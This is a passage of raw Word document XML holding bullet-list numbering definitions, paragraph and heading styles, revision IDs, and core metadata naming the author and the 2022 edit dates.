      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="238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08145908">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="310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D08FDDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382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F021228">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="454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F2B49D3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="526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2AE86740">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="598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8DF0C830">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="670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526C4E99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17D82C56"/>
    <w:lvl w:ilvl="0" w:tplc="665E8A16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8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FFC1A3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="17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9A80514">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="24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94AC658">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="31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39E0450">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="38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A1EF000">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="45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3386C82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="53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9F04D42">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="60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776D73E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="67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70C7AB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="062C007E"/>
    <w:lvl w:ilvl="0" w:tplc="2E26CFCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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60C69D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="17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F5C4D7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="24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71453C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="31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5148324">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="38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81EB442">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="45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58C4A32">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="53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7BADB00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="60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1FA9196">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="67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2107531131">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="933394699">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1727795777">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="203865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E6C"/>
    <w:rsid w:val="00080CD9"/>
    <w:rsid w:val="000E5BEC"/>
    <w:rsid w:val="00766A10"/>
    <w:rsid w:val="00842E6C"/>
    <w:rsid w:val="00A07168"/>
    <w:rsid w:val="00AA1442"/>
    <w:rsid w:val="00B23B31"/>
    <w:rsid w:val="00B63536"/>
    <w:rsid w:val="00D31DA4"/>
    <w:rsid w:val="00DE7961"/>
    <w:rsid w:val="00F4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66F5"/>
  <w15:docId w15:val="{C01CB820-1301-4A3C-A45B-517F4C47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48" w:lineRule="auto"/>
      <w:ind w:left="286" w:right="713" w:hanging="10"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="83"/>
      <w:ind w:right="432"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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deom</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deom</dc:title>
  <dc:subject/>
  <dc:creator>JAYESH BURANDE</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Chaitanya Kulkarni</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-11T03:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-11T07:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>